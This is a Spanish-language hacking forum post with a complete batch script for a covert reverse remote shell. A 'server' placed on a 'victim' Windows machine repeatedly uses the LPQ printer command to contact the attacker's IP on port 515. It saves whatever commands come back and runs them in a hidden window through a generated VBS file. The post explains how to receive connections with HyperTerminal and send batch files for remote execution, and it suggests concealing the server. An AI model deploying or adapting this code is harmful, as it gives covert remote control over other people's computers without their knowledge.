Autor
Manual - Ejecutar Shell Remota con LPQ (Comando para Impresoras)
Generalmente no posteo en Hacking en este foro, pero esta vez lo hare
Bueno, explico..
Aqui creamos algo asi como una Shell Inversa..
Donde nosotros tenemos un Cliente y donde la "Victima" (El termino es solo para explicar) tiene nuestro Server que se conectara a nosotros..
Bien creo que eso ya se entiende y con tantos post que explican eso..
Esto se me ocurrio cuando no disponia de recursos, osea 0 NetCat..
Solo Batch, y WinRar en MI PC..
Y decidi inventar alguna forma de poder tener algo asi como un FTP, o como una Shell Remota asi que salio esto:
1.-Paso
Creamos el Server con un Simple Batch:
Abrimos Block de Notas y copiamos y pegamos:
Código
@Echo offAhora los que saben de Batch, lo mejoraran a su Gusto.., la variable INF esta la Info que sale al conectarnos pueden cambiarla a su gusto..
Title .::Batch Remote Execution - Usando el comando LPQ (Para Impresoras) BY 3D1::.
Set "IP=127.0.0.1"
Set "INF= Remote Shell Domain:\\%UserDomain% User:%UserName%" PathShell: %CD%
Echo %INF%
(
Echo Set OBJ = CreateObject("WScript.Shell"^)
Echo OBJ.Run "Cmd /c" ^& Chr(34^) ^& WScript.Arguments(0^) ^& Chr(34^), VbHide
)>ShowWindow.vbs
:connect
LPQ -S %IP% -P "%INF%" >Batch.Cmd 2>&1
Set /p Error=<Batch.Cmd
If "%Error%" NEQ "Error: no ha habido respuesta de %IP%." (
Type Batch.cmd|Find /I /V "%INF%" >Batchs.Cmd
Del /Q /A Batch.cmd
Ren Batchs.cmd Batch.cmd
CScript //nologo ShowWindow.vbs "%~d0%~p0Batch.Cmd"
Ping -n 4 127.0.0.1 >nul 2>&1
)
Goto :connect
Ahora nuestra IP debe de venir aqui:
Código
Set "IP=127.0.0.1"Reemplazan 127.0.0.1 por vuestra IP, o pueden probarlo localmente, el puerto que usa es el 515, y no es posible cambiarlo asta donde ahora he visto pero si lo allo les aviso..
Aqui el que hace el trabajo es el comando LPQ que sirve para servicios de Impresoras pero aqui le doy otro uso..
2.-Paso
Nos ponemos a la Escucha, si tiene NetCat usenlo pero yo usare la Hiperterminal simulando que estamos escasos de recursos y lo unico que tenemos es eso, ok
se van ha "Inicio" luego le dan Click en "Ejecutar" y escriben:
Código
Hypertrm.exea veces aparecen una serie de ventanas, pero ponganle cancelar, asta ver la ventana de "Descripcion de la Conexion"
el la casilla "Nombre" colocar lo que deseen no interesa luego le dan Click en Aceptar
Luego que les salga la ventana de "Conectar a"
se van ha el List de "Conectar Usando:" y seleccionan "TCP/IP Winsock"
Luego se van a la casilla "Direccion de Host" y escriben 0.0.0.0 y en "Puerto" ponen 515
Listo..
para poner el Server a la Escucha le dan click en el menu "llamar"
luego en "Esperar una LLamada"
y listo..
3.-Paso
Cuando se nos conecte, creo que se daran cuenta recibiran un mensaje..
luego en la Hiperterminal le dan click en "Transferir" y luego en "Enviar Archivo de Texto"
y seleccionan el Batch que enviaran al equipo remoto..
El Batch se ejecuta de manera oculta, osea no se ve la ventana del MS-DOS..
Ahora para ocultar el server, eso sera cosa suya hay mucho en la sección de Bacth podrian pasarse unos segundos por ahi..
Para probar pueden ejecutar el Server es su propio equipo..
SaluDOS!!!
PD: Cualquier duda, posteenla
En línea
